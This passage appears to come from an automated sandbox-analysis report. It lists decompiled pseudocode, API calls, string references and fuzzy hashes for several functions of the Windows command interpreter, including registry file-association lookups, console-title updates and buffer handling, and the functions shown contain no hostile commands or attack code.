                                                      • Part of subcall function 011E00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000), ref: 011E00C1
                                                      • Part of subcall function 011E00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000,?), ref: 011E00C8
                                                    • wcschr.MSVCRT ref: 011FB377
                                                    • memcpy.MSVCRT ref: 011FB3F7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: Heap$AllocProcessmemcpywcschr
                                                    • String ID: &()[]{}^=;!%'+,`~
                                                    • API String ID: 3241892172-381716982
                                                    • Opcode ID: 8b0a23908fb75cdb795a4fa811c3c8bef449d78a517bc53c237b2e3ca4f08200
                                                    • Instruction ID: a4968a7c3d17b64c3cab38cdff0da4d815c3be77eff07a2c7b1b08b394f56e1c
                                                    • Opcode Fuzzy Hash: 8b0a23908fb75cdb795a4fa811c3c8bef449d78a517bc53c237b2e3ca4f08200
                                                    • Instruction Fuzzy Hash: 6C614DB0E08219CBCF2CCFA9E5945BDBBF1FB48314B25412EEA16E7254D7709941CB58
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011F4A29, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88registryCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 78%
                                                    			E011F4A29(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t24;
				intOrPtr* _t33;
				intOrPtr _t34;
				signed int _t57;
				signed int _t59;
				long _t61;
				void* _t62;

				_push(0x1c);
				_push(0x11fc120);
				E011E7678(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t62 - 0x2c)) = __ecx;
				_t59 = 0;
				 *((intOrPtr*)(_t62 - 0x24)) = 0;
				_t37 = 0;
				 *((intOrPtr*)(_t62 - 0x28)) = 0;
				_t61 = RegOpenKeyExW(0x80000002, L"Software\\Classes", 0, 0x2000000, _t62 - 0x20);
				 *((intOrPtr*)(_t62 - 0x1c)) = _t61;
				if(_t61 == 0) {
					_t24 = E011DEA40( *((intOrPtr*)( *((intOrPtr*)(_t62 - 0x2c)) + 0x3c)), "=", 3);
					 *((intOrPtr*)(_t62 - 0x2c)) = _t24;
					 *((intOrPtr*)(_t62 - 4)) = 0;
					if( *_t24 != 0) {
						_t59 = E011DDF40(E011E22C0(0, _t24));
						 *((intOrPtr*)(_t62 - 0x24)) = _t59;
						__eflags = _t59;
						if(_t59 != 0) {
							_t46 =  *(E011DD7E6( *((intOrPtr*)(_t62 - 0x2c)))) & 0x0000ffff;
							__eflags = _t46;
							if(_t46 != 0) {
								__eflags = _t46 - 0x3d;
								if(_t46 == 0x3d) {
									 *((intOrPtr*)(_t62 - 0x2c)) = E011DD7E6(_t29);
									_t37 = E011DDF40(E011E22C0(0, _t30));
									 *((intOrPtr*)(_t62 - 0x28)) = _t37;
									__eflags = _t37;
									if(_t37 != 0) {
										_t33 = E011DD7E6( *((intOrPtr*)(_t62 - 0x2c)));
										_t46 = 0;
										__eflags =  *_t33;
										if(__eflags == 0) {
											_t34 = E011F587B(_t37,  *(_t62 - 0x20), _t59, _t59, _t61, __eflags, _t37);
											goto L14;
										} else {
											_push(0);
											goto L9;
										}
									}
								} else {
									_push(0);
									L9:
									_push(0x232a);
									E011DC5A2(_t46);
								}
							} else {
								_t57 = _t59;
								goto L3;
							}
						}
					} else {
						_t57 = 0;
						L3:
						_t34 = E011F4B4E( *(_t62 - 0x20), _t57);
						L14:
						_t61 = _t34;
						 *((intOrPtr*)(_t62 - 0x1c)) = _t61;
					}
					 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
					E011F4B3F(_t37, _t59);
					RegCloseKey( *(_t62 - 0x20));
					_t22 = _t61;
				}
				return E011E76BD(_t22);
			}










                                                    0x011f4a29
                                                    0x011f4a2b
                                                    0x011f4a30
                                                    0x011f4a35
                                                    0x011f4a3a
                                                    0x011f4a3c
                                                    0x011f4a3f
                                                    0x011f4a41
                                                    0x011f4a5e
                                                    0x011f4a60
                                                    0x011f4a65
                                                    0x011f4a78
                                                    0x011f4a7d
                                                    0x011f4a82
                                                    0x011f4a88
                                                    0x011f4aa4
                                                    0x011f4aa6
                                                    0x011f4aa9
                                                    0x011f4aab
                                                    0x011f4ab5
                                                    0x011f4ab8
                                                    0x011f4abb
                                                    0x011f4ac1
                                                    0x011f4ac4
                                                    0x011f4add
                                                    0x011f4aee
                                                    0x011f4af0
                                                    0x011f4af3
                                                    0x011f4af5
                                                    0x011f4afa
                                                    0x011f4aff
                                                    0x011f4b01
                                                    0x011f4b04
                                                    0x011f4b0f
                                                    0x00000000
                                                    0x011f4b06
                                                    0x011f4b06
                                                    0x00000000
                                                    0x011f4b06
                                                    0x011f4b04
                                                    0x011f4ac6
                                                    0x011f4ac6
                                                    0x011f4ac8
                                                    0x011f4ac8
                                                    0x011f4acd
                                                    0x011f4ad3
                                                    0x011f4abd
                                                    0x011f4abd
                                                    0x00000000
                                                    0x011f4abd
                                                    0x011f4abb
                                                    0x011f4a8a
                                                    0x011f4a8a
                                                    0x011f4a8c
                                                    0x011f4a8f
                                                    0x011f4b14
                                                    0x011f4b14
                                                    0x011f4b16
                                                    0x011f4b16
                                                    0x011f4b19
                                                    0x011f4b20
                                                    0x011f4b28
                                                    0x011f4b2e
                                                    0x011f4b2e
                                                    0x011f4b35

                                                    APIs
                                                    • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Classes,00000000,02000000,?,011FC120,0000001C,011F5CB1), ref: 011F4A58
                                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEAB7
                                                      • Part of subcall function 011DEA40: iswspace.MSVCRT ref: 011DEB2D
                                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEB49
                                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEB6D
                                                    • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000003), ref: 011F4B28
                                                      • Part of subcall function 011F587B: RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,011FC0E0,00000018,011F4B14,00000000,00000003), ref: 011F58AF
                                                      • Part of subcall function 011F587B: RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,00000000,00000001,?,00000000,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,011FC0E0), ref: 011F58E5
                                                      • Part of subcall function 011F587B: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,011FC0E0,00000018,011F4B14,00000000,00000003), ref: 011F58F3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: wcschr$Close$CreateOpenValueiswspace
                                                    • String ID: Software\Classes
                                                    • API String ID: 1047774138-1656466771
                                                    • Opcode ID: abeff3abc363dee804b817d6d02234e0540efd0bcc4ccd28699ad22e83900b33
                                                    • Instruction ID: 16bbcc11c1592b2cd443cb292c473e01d7bef75e1f1bba585d0fb4a715f4daad
                                                    • Opcode Fuzzy Hash: abeff3abc363dee804b817d6d02234e0540efd0bcc4ccd28699ad22e83900b33
                                                    • Instruction Fuzzy Hash: CF319371F0421ACBDF1CEBF99854AAEB6B1AF98608F10406DD202BB691EB704900CB65
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011F51C5, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 86registryCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 75%
                                                    			E011F51C5(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t24;
				intOrPtr* _t32;
				intOrPtr _t33;
				signed int _t55;
				signed int _t57;
				long _t59;
				void* _t60;

				_push(0x1c);
				_push(0x11fc0c0);
				E011E7678(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t60 - 0x2c)) = __ecx;
				_t57 = 0;
				 *((intOrPtr*)(_t60 - 0x24)) = 0;
				_t36 = 0;
				 *((intOrPtr*)(_t60 - 0x28)) = 0;
				_t59 = RegOpenKeyExW(0x80000002, L"Software\\Classes", 0, 0x2000000, _t60 - 0x20);
				 *((intOrPtr*)(_t60 - 0x1c)) = _t59;
				if(_t59 == 0) {
					_t24 = E011DEA40( *((intOrPtr*)( *((intOrPtr*)(_t60 - 0x2c)) + 0x3c)), "=", 3);
					 *((intOrPtr*)(_t60 - 0x2c)) = _t24;
					 *((intOrPtr*)(_t60 - 4)) = 0;
					if( *_t24 != 0) {
						_t57 = E011DDF40(E011E22C0(0, _t24));
						 *((intOrPtr*)(_t60 - 0x24)) = _t57;
						if(_t57 != 0) {
							_t45 =  *(E011DD7E6( *((intOrPtr*)(_t60 - 0x2c)))) & 0x0000ffff;
							if(_t45 != 0) {
								if(_t45 == 0x3d) {
									 *((intOrPtr*)(_t60 - 0x2c)) = E011DD7E6(_t29);
									_t36 = E011DDF40(_t30);
									 *((intOrPtr*)(_t60 - 0x28)) = _t36;
									if(_t36 != 0) {
										_t32 = E011DD7E6( *((intOrPtr*)(_t60 - 0x2c)));
										_t45 = 0;
										if( *_t32 == 0) {
											_t33 = E011F59E6( *(_t60 - 0x20), _t57, _t36);
											goto L14;
										} else {
											_push(0);
											goto L9;
										}
									}
								} else {
									_push(0);
									L9:
									_push(0x232a);
									E011DC5A2(_t45);
								}
							} else {
								_t55 = _t57;
								goto L3;
							}
						}
					} else {
						_t55 = 0;
						L3:
						_t33 = E011F4CF0( *(_t60 - 0x20), _t55);
						L14:
						_t59 = _t33;
						 *((intOrPtr*)(_t60 - 0x1c)) = _t59;
					}
					 *((intOrPtr*)(_t60 - 4)) = 0xfffffffe;
					E011F52D4(_t36, _t57);
					RegCloseKey( *(_t60 - 0x20));
					_t22 = _t59;
				}
				return E011E76BD(_t22);
			}










                                                    0x011f51c5
                                                    0x011f51c7
                                                    0x011f51cc
                                                    0x011f51d1
                                                    0x011f51d6
                                                    0x011f51d8
                                                    0x011f51db
                                                    0x011f51dd
                                                    0x011f51fa
                                                    0x011f51fc
                                                    0x011f5201
                                                    0x011f5214
                                                    0x011f5219
                                                    0x011f521e
                                                    0x011f5224
                                                    0x011f5240
                                                    0x011f5242
                                                    0x011f5247
                                                    0x011f5251
                                                    0x011f5257
                                                    0x011f5260
                                                    0x011f5279
                                                    0x011f5283
                                                    0x011f5285
                                                    0x011f528a
                                                    0x011f528f
                                                    0x011f5294
                                                    0x011f5299
                                                    0x011f52a4
                                                    0x00000000
                                                    0x011f529b
                                                    0x011f529b
                                                    0x00000000
                                                    0x011f529b
                                                    0x011f5299
                                                    0x011f5262
                                                    0x011f5262
                                                    0x011f5264
                                                    0x011f5264
                                                    0x011f5269
                                                    0x011f526f
                                                    0x011f5259
                                                    0x011f5259
                                                    0x00000000
                                                    0x011f5259
                                                    0x011f5257
                                                    0x011f5226
                                                    0x011f5226
                                                    0x011f5228
                                                    0x011f522b
                                                    0x011f52a9
                                                    0x011f52a9
                                                    0x011f52ab
                                                    0x011f52ab
                                                    0x011f52ae
                                                    0x011f52b5
                                                    0x011f52bd
                                                    0x011f52c3
                                                    0x011f52c3
                                                    0x011f52ca

                                                    APIs
                                                    • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Classes,00000000,02000000,?,011FC0C0,0000001C,011F5CE1), ref: 011F51F4
                                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEAB7
                                                      • Part of subcall function 011DEA40: iswspace.MSVCRT ref: 011DEB2D
                                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEB49
                                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEB6D
                                                    • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000003), ref: 011F52BD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: wcschr$CloseOpeniswspace
                                                    • String ID: Software\Classes
                                                    • API String ID: 2439148603-1656466771
                                                    • Opcode ID: 4dd9ddeb385e1cd5fbcbc5630ad4a82afa5d8ba7ba8324beceffa71e89ef2d1b
                                                    • Instruction ID: 188134ed55947d5e37ba7f7e500ab3202b526c03b3a4153a5a2b73b58eeda4e9
                                                    • Opcode Fuzzy Hash: 4dd9ddeb385e1cd5fbcbc5630ad4a82afa5d8ba7ba8324beceffa71e89ef2d1b
                                                    • Instruction Fuzzy Hash: 8E21B475E04306CBDF5CEBF9D8546ADB6F2AF98618F11812DE502BB294EB704D01CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011E100C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E011E100C(long __eax, intOrPtr* __ecx) {
				intOrPtr _v8;
				signed int _v12;
				long _t13;
				intOrPtr _t14;
				signed int _t15;
				short _t21;
				signed int _t24;
				intOrPtr* _t26;
				intOrPtr* _t29;
				WCHAR* _t35;
				long _t40;
				intOrPtr _t43;
				short* _t44;
				WCHAR* _t47;
				void* _t48;
				WCHAR* _t49;

				_t13 = __eax;
				_t26 = __ecx;
				if(__ecx != 0 &&  *0x1213cc4 == 0 &&  *0x1213ccc == 0) {
					_t13 = E011E00B0(0x20c);
					_t47 = _t13;
					if(_t47 != 0) {
						_t13 = GetConsoleTitleW(_t47, 0x104);
						_t40 = _t13;
						if(_t40 != 0) {
							_v12 = _v12 & 0x00000000;
							_t29 = _t26;
							_t3 = _t29 + 2; // 0x2
							_t48 = _t3;
							do {
								_t14 =  *_t29;
								_t29 = _t29 + 2;
							} while (_t14 != _v12);
							_t15 =  *0x11fd570; // 0x0
							_t17 = _t15 + (_t29 - _t48 >> 1) + _t40 + 0xa;
							_v8 = _t15 + (_t29 - _t48 >> 1) + _t40 + 0xa;
							_t49 = E011E0100(_t47, _t15 + (_t29 - _t48 >> 1) + _t40 + 0xa + _t17);
							if(_t49 == 0) {
								L16:
								return E011E0040(_t47);
							}
							_t47 = _t49;
							_t43 = _v8;
							if( *0x11fd59c == 0) {
								E011E18C0(_t49, _t43, L" - ");
								_t35 = _t49;
								_t10 =  &(_t35[1]); // 0x2
								_t44 = _t10;
								do {
									_t21 =  *_t35;
									_t35 =  &(_t35[1]);
								} while (_t21 != _v12);
								 *0x11fd570 = _t35 - _t44 >> 1;
								E011E18C0(_t49, _v8, _t26);
								 *0x11fd59c = 1;
								L15:
								SetConsoleTitleW(_t49);
								goto L16;
							}
							_t24 =  *0x11fd570; // 0x0
							E011E1040( &(_t49[_t24]), _t43 - _t24, _t26);
							goto L15;
						}
					}
				}
				return _t13;
			}



















                                                    0x011e100c
                                                    0x011e1015
                                                    0x011e101b
                                                    0x011ecdca
                                                    0x011ecdcf
                                                    0x011ecdd3
                                                    0x011ecddf
                                                    0x011ecde5
                                                    0x011ecde9
                                                    0x011ecdef
                                                    0x011ecdf3
                                                    0x011ecdf5
                                                    0x011ecdf5
                                                    0x011ecdf8
                                                    0x011ecdf8
                                                    0x011ecdfb
                                                    0x011ecdfe
                                                    0x011ece04
                                                    0x011ece14
                                                    0x011ece16
                                                    0x011ece21
                                                    0x011ece25
                                                    0x011ece87
                                                    0x00000000
                                                    0x011ece89
                                                    0x011ece2e
                                                    0x011ece30
                                                    0x011ece33
                                                    0x011ece4e
                                                    0x011ece53
                                                    0x011ece55
                                                    0x011ece55
                                                    0x011ece58
                                                    0x011ece58
                                                    0x011ece5b
                                                    0x011ece5e
                                                    0x011ece6b
                                                    0x011ece74
                                                    0x011ece79
                                                    0x011ece80
                                                    0x011ece81
                                                    0x00000000
                                                    0x011ece81
                                                    0x011ece35
                                                    0x011ece40
                                                    0x00000000
                                                    0x011ece40
                                                    0x011ecde9
                                                    0x011ecdd3
                                                    0x011e102c

                                                    APIs
                                                    • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(00000000,00000104,?,00000000,00000000,?,?,011E0B7F), ref: 011ECDDF
                                                    • SetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(00000000,00000000, - ,?,00000000,00000000,?), ref: 011ECE81
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: ConsoleTitle
                                                    • String ID: -
                                                    • API String ID: 3358957663-3695764949
                                                    • Opcode ID: 93ba80149b28576f0529ffd912952ffa009b93b1c03078cd9537d4d9349b9673
                                                    • Instruction ID: bce5c884affaa0be082da193b3b4460890e0cb0b0d94b9947ffa115a1213973f
                                                    • Opcode Fuzzy Hash: 93ba80149b28576f0529ffd912952ffa009b93b1c03078cd9537d4d9349b9673
                                                    • Instruction Fuzzy Hash: 3421E47270090167CB2D9BECE85C7BE7EF2AB84714F19412CD91697249EF315946CBC2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011F8430, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 85%
                                                    			E011F8430(void* __ecx, void* __edx, signed int _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a52) {
				void* _t14;
				void* _t26;
				void* _t31;

				_t26 = __edx;
				_t25 = __ecx;
				_push(__ecx);
				_push(__ecx);
				if((_a4 | _a8) == 0) {
					_t31 = 0x64;
				} else {
					_t31 = E011E8100(E011E81B0(_a12, _a16, 0x64, 0), _t26, _a4, _a8);
				}
				_t23 = L"%3d";
				E011E274C(0x1213d00, 0x104, L"%3d", _t31);
				E011DC108(_t25, 0x40002722, 1, 0x1213d00);
				if( *0x11fd544 == 0) {
					_t14 = 0;
				} else {
					E011E274C(0x1213d00, 0x104, _t23, _t31);
					E011DC108(_t25, 0x40002722, 1, 0x1213d00);
					printf("\n");
					_t14 = (0 | _a52 != 0x00000000) + 1;
				}
				return _t14;
			}






                                                    0x011f8430
                                                    0x011f8430
                                                    0x011f8435
                                                    0x011f8436
                                                    0x011f8440
                                                    0x011f8464
                                                    0x011f8442
                                                    0x011f845e
                                                    0x011f845e
                                                    0x011f8466
                                                    0x011f8477
                                                    0x011f8484
                                                    0x011f8493
                                                    0x011f84c8
                                                    0x011f8495
                                                    0x011f849d
                                                    0x011f84aa
                                                    0x011f84b4
                                                    0x011f84c5
                                                    0x011f84c5
                                                    0x011f84d0

                                                    APIs
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 011F8459
                                                    • printf.MSVCRT ref: 011F84B4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@printf
                                                    • String ID: %3d
                                                    • API String ID: 2845598586-2138283368
                                                    • Opcode ID: 7f054879c8c387edf171a89102b36f6b4470f0748cc0b2fef102b9542563becc
                                                    • Instruction ID: 6f424aa0bbd4063a4a801d53f52ded861282c6af39b1cd7a6efb9a8359747c55
                                                    • Opcode Fuzzy Hash: 7f054879c8c387edf171a89102b36f6b4470f0748cc0b2fef102b9542563becc
                                                    • Instruction Fuzzy Hash: C3012DB1650105BFFB286BA59C89FEB3EEDDBA5BA4F00401CFB0855080D7B19850C2B1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011E0C70, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 63%
                                                    			E011E0C70(void* __ecx, int _a4) {
				void* _v0;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t24;
				int _t34;
				void* _t35;
				void* _t36;
				void* _t37;

				_t35 = __ecx;
				_t34 = _a4;
				_t39 = _t34 -  *((intOrPtr*)(__ecx + 0x210));
				if(_t34 <=  *((intOrPtr*)(__ecx + 0x210))) {
					L6:
					return 0;
				}
				_push(0x11d262a);
				_t24 = E011E72B5(_t23, _t34, __ecx, _t39,  ~(0 | _t39 > 0x00000000) | _t34 * 0x00000002);
				_t37 = _t36 + 8;
				if(_t24 == 0) {
					E011F292C("onecore\\base\\cmd\\maxpathawarestring.cpp", 0x8007000e);
					return 0x8007000e;
				}
				_t20 =  *(_t35 + 0x208);
				if(_t24 != _t20) {
					__imp__??_V@YAXPAX@Z(_t20);
					_t37 = _t37 + 4;
					 *(_t35 + 0x208) = _t24;
				}
				_t21 =  *(_t35 + 0x208);
				 *(_t35 + 0x210) = _t34;
				if(_t21 == 0) {
					_t21 = _t35;
				}
				memset(_t21, 0, _t34);
				goto L6;
			}
















                                                    0x011e0c77
                                                    0x011e0c7a
                                                    0x011e0c7d
                                                    0x011e0c83
                                                    0x011e0ce5
                                                    0x00000000
                                                    0x011e0ce5
                                                    0x011e0c90
                                                    0x011e0ca2
                                                    0x011e0ca4
                                                    0x011e0ca9
                                                    0x011ecd56
                                                    0x00000000
                                                    0x011ecd5b
                                                    0x011e0caf
                                                    0x011e0cb7
                                                    0x011e0cba
                                                    0x011e0cc0
                                                    0x011e0cc3
                                                    0x011e0cc3
                                                    0x011e0cc9
                                                    0x011e0ccf
                                                    0x011e0cd7
                                                    0x011e0cee
                                                    0x011e0cee
                                                    0x011e0cdd
                                                    0x00000000

                                                    APIs
                                                      • Part of subcall function 011E72B5: __EH_prolog3_catch.LIBCMT ref: 011E7650
                                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                                    • memset.MSVCRT ref: 011E0CDD
                                                    Strings
                                                    • onecore\base\cmd\maxpathawarestring.cpp, xrefs: 011ECD51
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: H_prolog3_catchmemset
                                                    • String ID: onecore\base\cmd\maxpathawarestring.cpp
                                                    • API String ID: 620422817-3416068913
                                                    • Opcode ID: 13470685c5a9af4dfeb5f5de8d83b0e48ecae77a8ee90b56d2c9fd771910876e
                                                    • Instruction ID: e158b470713e9f8187c53dfda88aa9db20da53aef0ddbfa8dd8e52c343665afc
                                                    • Opcode Fuzzy Hash: 13470685c5a9af4dfeb5f5de8d83b0e48ecae77a8ee90b56d2c9fd771910876e
                                                    • Instruction Fuzzy Hash: 7A01D871300705ABE72C86F99C8DB6BB6D9EB94250F04053DF556D7240DBF6EC51C2A1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011DDEF9, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E011DDEF9(signed short* __ecx) {
				long _t9;
				signed short* _t11;

				_t11 = __ecx;
				if(__ecx != 0) {
					while(1) {
						_t9 =  *_t11 & 0x0000ffff;
						if(iswspace(_t9) != 0) {
							goto L6;
						}
						L3:
						if(wcschr(L"=,;", _t9) != 0) {
							if(_t9 == 0) {
								goto L4;
							} else {
								L7:
								_t11 =  &(_t11[1]);
								continue;
							}
							L10:
						}
						L4:
						goto L5;
						L6:
						if(_t9 == 0xa) {
							goto L3;
						} else {
							goto L7;
						}
						goto L5;
					}
				}
				L5:
				return _t11;
				goto L10;
			}





                                                    0x011ddefc
                                                    0x011ddf00
                                                    0x011ddf03
                                                    0x011ddf03
                                                    0x011ddf10
                                                    0x00000000
                                                    0x00000000
                                                    0x011ddf12
                                                    0x011ddf22
                                                    0x011ddf36
                                                    0x00000000
                                                    0x011ddf38
                                                    0x011ddf2e
                                                    0x011ddf2e
                                                    0x00000000
                                                    0x011ddf2e
                                                    0x00000000
                                                    0x011ddf36
                                                    0x011ddf24
                                                    0x00000000
                                                    0x011ddf29
                                                    0x011ddf2c
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011ddf2c
                                                    0x011ddf03
                                                    0x011ddf25
                                                    0x011ddf28
                                                    0x00000000

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: iswspacewcschr
                                                    • String ID: =,;
                                                    • API String ID: 287713880-1539845467
                                                    • Opcode ID: fb635d01fdab01a92e06613db8bd814aba91ffdf2a6cd8081524eadea6ea8e71
                                                    • Instruction ID: db932e6896e5513591f390be794c8b091ebc46a050c7d1fd813f3b29e87dfa73
                                                    • Opcode Fuzzy Hash: fb635d01fdab01a92e06613db8bd814aba91ffdf2a6cd8081524eadea6ea8e71
                                                    • Instruction Fuzzy Hash: D3E04F37608522925F3D0BDEB9599779ED9CAE6A2531B01AFF900D31C0EB6188438293
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%